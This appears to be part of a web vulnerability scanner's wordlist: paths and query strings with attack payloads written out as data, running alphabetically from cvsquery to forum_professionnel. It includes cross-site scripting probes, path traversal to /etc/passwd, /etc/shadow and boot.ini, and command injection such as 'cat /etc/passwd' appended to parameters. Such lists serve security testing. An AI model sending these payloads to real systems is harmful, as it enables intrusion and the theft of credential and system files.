cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
|
||
|
|
cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
|
||
|
|
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
|
||
|
|
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
|
||
|
|
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
|
||
|
|
da.nsf
|
||
|
|
dan_o.dat
|
||
|
|
dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
|
||
|
|
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
|
||
|
|
dasp/fm_shell.asp
|
||
|
|
dat/
|
||
|
|
data.sql
|
||
|
|
data/
|
||
|
|
data/config/microsrv.cfg
|
||
|
|
data/fetch.php?page=
|
||
|
|
data/member_log.txt
|
||
|
|
data/userlog/log.txt
|
||
|
|
database.nsf
|
||
|
|
database/
|
||
|
|
database/db2000.mdb
|
||
|
|
database/metacart.mdb
|
||
|
|
database/metacart.mdb+
|
||
|
|
databases/
|
||
|
|
databse.sql
|
||
|
|
date
|
||
|
|
dato/
|
||
|
|
datos/
|
||
|
|
day5datacopier.cgi
|
||
|
|
day5datanotifier.cgi
|
||
|
|
db.nsf
|
||
|
|
db.php
|
||
|
|
db.php?q='&t='
|
||
|
|
db.sql
|
||
|
|
db/
|
||
|
|
db/users.dat
|
||
|
|
db2www/library/document.d2w/show
|
||
|
|
db4web_c/dbdirname//etc/passwd
|
||
|
|
db_manager.cgi
|
||
|
|
dbabble
|
||
|
|
dbase/
|
||
|
|
dbman/db.cgi?db=no-db
|
||
|
|
dbmlparser.exe
|
||
|
|
dc/auth_data/auth_user_file.txt
|
||
|
|
dc/orders/orders.txt
|
||
|
|
dcforum.cgi?az=list&forum=../../../../../../../../../../etc
|
||
|
|
dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
|
||
|
|
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
|
||
|
|
dclf.nsf
|
||
|
|
dcp/advertiser.php
|
||
|
|
dcshop/auth_data/auth_user_file.txt
|
||
|
|
dcshop/orders/orders.txt
|
||
|
|
debug/dbg?host==<script>alert('Vulnerable');</script>
|
||
|
|
debug/echo?name=<script>alert('Vulnerable');</script>
|
||
|
|
debug/errorInfo?title===<script>alert('Vulnerable');</script>
|
||
|
|
debug/showproc?proc===<script>alert('Vulnerable');</script>
|
||
|
|
decsadm.nsf
|
||
|
|
decsdoc.nsf
|
||
|
|
decslog.nsf
|
||
|
|
default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
|
||
|
|
default.nsf
|
||
|
|
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
|
||
|
|
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
|
||
|
|
defines.php
|
||
|
|
demo/
|
||
|
|
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
|
||
|
|
demo/ojspext/events/globals.jsa
|
||
|
|
demo/sql/index.jsp
|
||
|
|
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
|
||
|
|
demos/
|
||
|
|
dev/
|
||
|
|
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
|
||
|
|
devel/
|
||
|
|
development/
|
||
|
|
dfire.cgi
|
||
|
|
diagnose.cgi
|
||
|
|
diapo.php?rep=<script>alert(document.cookie)</script>
|
||
|
|
dig.cgi
|
||
|
|
dir/
|
||
|
|
dirassist.nsf
|
||
|
|
directory.php?dir=%3Bcat%20/etc/passwd
|
||
|
|
directory/
|
||
|
|
directorypro.cgi?want=showcat&show=../../../../../../../../../../etc
|
||
|
|
directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
|
||
|
|
displayTC.pl
|
||
|
|
dltclnt.php
|
||
|
|
dms0
|
||
|
|
dnewsweb
|
||
|
|
do_map
|
||
|
|
do_subscribe
|
||
|
|
doc
|
||
|
|
doc-html/
|
||
|
|
doc/
|
||
|
|
doc/admin/index.php
|
||
|
|
doc/domguide.nsf
|
||
|
|
doc/dspug.nsf
|
||
|
|
doc/help4.nsf
|
||
|
|
doc/helpadmin.nsf
|
||
|
|
doc/helplt4.nsf
|
||
|
|
doc/internet.nsf
|
||
|
|
doc/javapg.nsf
|
||
|
|
doc/lccon.nsf
|
||
|
|
doc/migrate.nsf
|
||
|
|
doc/npn_admn.nsf
|
||
|
|
doc/npn_rn.nsf
|
||
|
|
doc/packages/
|
||
|
|
doc/readmec.nsf
|
||
|
|
doc/readmes.nsf
|
||
|
|
doc/rt/overview-summary.html
|
||
|
|
doc/smhelp.nsf
|
||
|
|
doc/srvinst.nsf
|
||
|
|
doc/webmin.config.notes
|
||
|
|
docs/
|
||
|
|
docs/<script>alert('Vulnerable');</script>
|
||
|
|
docs/NED
|
||
|
|
docs/NED?action=retrieve&location=.
|
||
|
|
docs/sdb/en/html/index.html
|
||
|
|
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
|
||
|
|
doladmin.nsf
|
||
|
|
dols_help.nsf
|
||
|
|
domadmin.nsf
|
||
|
|
domcfg.nsf
|
||
|
|
domguide.nsf
|
||
|
|
domlog.nsf
|
||
|
|
donothing
|
||
|
|
dose.pl?daily&somefile.txt&|ls|
|
||
|
|
dostuff.php?action=modify_user
|
||
|
|
dotproject/modules/files/index_table.php
|
||
|
|
dotproject/modules/projects/addedit.php
|
||
|
|
dotproject/modules/projects/view.php
|
||
|
|
dotproject/modules/projects/vw_files.php
|
||
|
|
dotproject/modules/tasks/addedit.php
|
||
|
|
dotproject/modules/tasks/viewgantt.php
|
||
|
|
down/
|
||
|
|
download.cgi
|
||
|
|
download.php?op=viewdownload
|
||
|
|
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
|
||
|
|
download/
|
||
|
|
downloads/
|
||
|
|
downloads/pafiledb.php?action=download&id=4?\"<script>alert('Vulnerable')</script>\"
|
||
|
|
downloads/pafiledb.php?action=email&id=4?\"<script>alert('Vulnerable')</script>\"
|
||
|
|
downloads/pafiledb.php?action=rate&id=4?\"<script>alert('Vulnerable')</script>\"
|
||
|
|
dspug.nsf
|
||
|
|
dumpenv.pl
|
||
|
|
easylog/easylog.html
|
||
|
|
echo.bat
|
||
|
|
echo.bat?&dir+c:\\
|
||
|
|
edit.pl
|
||
|
|
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
|
||
|
|
ejemplo/
|
||
|
|
ejemplos/
|
||
|
|
email.php
|
||
|
|
emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
|
||
|
|
emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
|
||
|
|
emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
|
||
|
|
emml_email_func.php
|
||
|
|
employees/
|
||
|
|
empower?DB=whateverwhatever
|
||
|
|
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
|
||
|
|
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
emumail.cgi?type=.%00
|
||
|
|
emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
|
||
|
|
enter.cgi
|
||
|
|
entete.php
|
||
|
|
enteteacceuil.php
|
||
|
|
envia/
|
||
|
|
enviamail/
|
||
|
|
environ.cgi
|
||
|
|
environ.pl
|
||
|
|
environ.pl?param1=<script>alert(document.cookie)</script>
|
||
|
|
erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
|
||
|
|
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
|
||
|
|
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
|
||
|
|
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
|
||
|
|
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
|
||
|
|
error/HTTP_NOT_FOUND.html.var
|
||
|
|
error_log
|
||
|
|
errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
|
||
|
|
es/
|
||
|
|
eshop.pl/seite=;cat%20eshop.pl|
|
||
|
|
esp?PAGE=<script>alert(document.cookie)</script>
|
||
|
|
etc/passwd
|
||
|
|
etc/shadow+
|
||
|
|
event.nsf
|
||
|
|
eventcal2.php.php
|
||
|
|
events.nsf
|
||
|
|
events4.nsf
|
||
|
|
events5.nsf
|
||
|
|
eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
|
||
|
|
eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
|
||
|
|
ews/ews/architext_query.pl
|
||
|
|
ex-logger.pl
|
||
|
|
examples/
|
||
|
|
examples/basic/servlet/HelloServlet
|
||
|
|
examples/context
|
||
|
|
examples/cookie
|
||
|
|
examples/forward1
|
||
|
|
examples/forward2
|
||
|
|
examples/header
|
||
|
|
examples/include1
|
||
|
|
examples/info
|
||
|
|
examples/jsp/index.html
|
||
|
|
examples/jsp/snp/anything.snp
|
||
|
|
examples/jsp/snp/snoop.jsp
|
||
|
|
examples/jsp/source.jsp??
|
||
|
|
examples/servlet/AUX
|
||
|
|
examples/servlet/TroubleShooter
|
||
|
|
examples/servlets/index.html
|
||
|
|
examples/session
|
||
|
|
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
|
||
|
|
excel/
|
||
|
|
exchange/
|
||
|
|
exchange/lib/AMPROPS.INC
|
||
|
|
exchange/lib/ATTACH.INC
|
||
|
|
exchange/lib/DELETE.INC
|
||
|
|
exchange/lib/GETREND.INC
|
||
|
|
exchange/lib/GETWHEN.INC
|
||
|
|
exchange/lib/JSATTACH.INC
|
||
|
|
exchange/lib/JSROOT.INC
|
||
|
|
exchange/lib/JSUTIL.INC
|
||
|
|
exchange/lib/LANG.INC
|
||
|
|
exchange/lib/PAGEUTIL.INC
|
||
|
|
exchange/lib/PUBFLD.INC
|
||
|
|
exchange/lib/RENDER.INC
|
||
|
|
exchange/lib/SESSION.INC
|
||
|
|
exchange/lib/logon.inc
|
||
|
|
exchange/root.asp?acs=anon
|
||
|
|
excite
|
||
|
|
excite;IF
|
||
|
|
excite;IFS=\
|
||
|
|
exe/
|
||
|
|
exec/show/config/cr
|
||
|
|
ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
|
||
|
|
ext.ini.%00.txt
|
||
|
|
ez2000/ezadmin.cgi
|
||
|
|
ez2000/ezboard.cgi
|
||
|
|
ez2000/ezman.cgi
|
||
|
|
ezadmin.cgi
|
||
|
|
ezboard.cgi
|
||
|
|
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
|
||
|
|
ezman.cgi
|
||
|
|
ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
|
||
|
|
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
|
||
|
|
ezshopper2/loadpage.cgi
|
||
|
|
ezshopper3/loadpage.cgi
|
||
|
|
faqman/index.php
|
||
|
|
faqmanager.cgi?toc=/etc/passwd%00
|
||
|
|
faxsurvey?cat%20/etc/passwd
|
||
|
|
fbsd/
|
||
|
|
fcgi-bin/echo
|
||
|
|
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
|
||
|
|
fcgi-bin/echo2
|
||
|
|
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
|
||
|
|
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
|
||
|
|
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
|
||
|
|
file-that-is-not-real-2002.php3
|
||
|
|
file/
|
||
|
|
file/../../../../../../../../etc/
|
||
|
|
fileadmin/
|
||
|
|
filemail
|
||
|
|
filemail.pl
|
||
|
|
filemanager/filemanager_forms.php
|
||
|
|
filemanager/index.php3
|
||
|
|
filemgmt/brokenfile.php
|
||
|
|
filemgmt/singlefile.php
|
||
|
|
filemgmt/viewcat.php
|
||
|
|
filemgmt/visit.php
|
||
|
|
files/
|
||
|
|
finance.xls
|
||
|
|
finances.xls
|
||
|
|
finger
|
||
|
|
finger.pl
|
||
|
|
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
|
||
|
|
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
|
||
|
|
flexform
|
||
|
|
flexform.cgi
|
||
|
|
fom.cgi?file=<script>alert('Vulnerable')</script>
|
||
|
|
fom.cgi?file=<script>alert('XSS')</script>
|
||
|
|
fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
|
||
|
|
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
|
||
|
|
foo.php3
|
||
|
|
forgot_password.php?email=\"><script>alert(document.cookie)</script>
|
||
|
|
formmail
|
||
|
|
formmail.cgi
|
||
|
|
formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
|
||
|
|
formmail.pl
|
||
|
|
formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
|
||
|
|
formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
|
||
|
|
foro/YaBB.pl
|
||
|
|
fortune
|
||
|
|
forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
|
||
|
|
forum-ra.asp?n=../../../../../../../../../etc/passwd
|
||
|
|
forum-ra.asp?n=../../../../../../../../../etc/passwd%00
|
||
|
|
forum-ra.asp?n=/../../../../../../../../../../../boot.ini
|
||
|
|
forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
|
||
|
|
forum-ra.asp?n=/etc/passwd
|
||
|
|
forum-ra.asp?n=/etc/passwd%00
|
||
|
|
forum-ra.asp?n=c:\boot.ini
|
||
|
|
forum-ra_professionnel.asp?n=%60/etc/passwd%60
|
||
|
|
forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
|
||
|
|
forum-ra_professionnel.asp?n=../../boot.ini
|
||
|
|
forum-ra_professionnel.asp?n=/....../boot.ini
|
||
|
|
forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
|
||
|
|
forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
|
||
|
|
forum-ra_professionnel.asp?n=/../../../etc/passwd
|
||
|
|
forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
|
||
|
|
forum-ra_professionnel.asp?n=/etc/passwd
|
||
|
|
forum-ra_professionnel.asp?n=/etc/passwd%00
|
||
|
|
forum-ra_professionnel.asp?n=c:\boot.ini
|
||
|
|
forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
|
||
|
|
forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
|
||
|
|
forum/
|
||
|
|
forum/admin/database/wwForum.mdb
|
||
|
|
forum/admin/wwforum.mdb
|
||
|
|
forum/index.php?method=<script>alert('Vulnerable')</script>
|
||
|
|
forum/mainfile.php
|
||
|
|
forum/member.php
|
||
|
|
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
|
||
|
|
forum/newreply.php
|
||
|
|
forum/newthread.php
|
||
|
|
forum/viewtopic.php
|
||
|
|
forum1.asp?n=%60/etc/passwd%60&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=/....../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
|
||
|
|
forum1.asp?n=/../../../../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=/../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=/etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=/etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1.asp?n=1753&nn=%60/etc/passwd%60
|
||
|
|
forum1.asp?n=1753&nn=....//....//....//....//....//....//....//etc.passwd
|
||
|
|
forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd
|
||
|
|
forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00
|
||
|
|
forum1.asp?n=1753&nn=/....../boot.ini
|
||
|
|
forum1.asp?n=1753&nn=/..../boot.ini
|
||
|
|
forum1.asp?n=1753&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
|
||
|
|
forum1.asp?n=1753&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
|
||
|
|
forum1.asp?n=1753&nn=/etc/passwd
|
||
|
|
forum1.asp?n=1753&nn=/etc/passwd%00
|
||
|
|
forum1.asp?n=1753&nn=c:\boot.ini
|
||
|
|
forum1.asp?n=c:\boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
|
||
|
|
forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
|
||
|
|
forum1_professionnel.asp?n=/....../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
|
||
|
|
forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
|
||
|
|
forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
|
||
|
|
forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
|
||
|
|
forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=....//....//....//....//....//....//....//etc.passwd&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=/....../boot.ini&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=....//....//....//....//....//....//....//etc.passwd
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=/....../boot.ini
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=/..../boot.ini
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=/.../.../.../.../.../.../boot.ini
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../../../../../../../../../../../boot.ini
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=/.\"./.\"./.\"./.\"./.\"./boot.ini
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00
|
||
|
|
forum1_professionnel.asp?n=1771&nn=100&page=c:\boot.ini
|
||
|
|
forum1_professionnel.asp?n=1771&nn=c:\boot.ini&page=1
|
||
|
|
forum1_professionnel.asp?n=c:\boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
|
||
|
|
forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
|
||
|
|
forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_arc.asp?n=268
|
||
|
|
forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
|
||
|
|
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
|
||
|
|
forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
|
||
|
|
forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
forum_professionnel.asp?n=100
|
||
|
|
forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
|
||
|
|
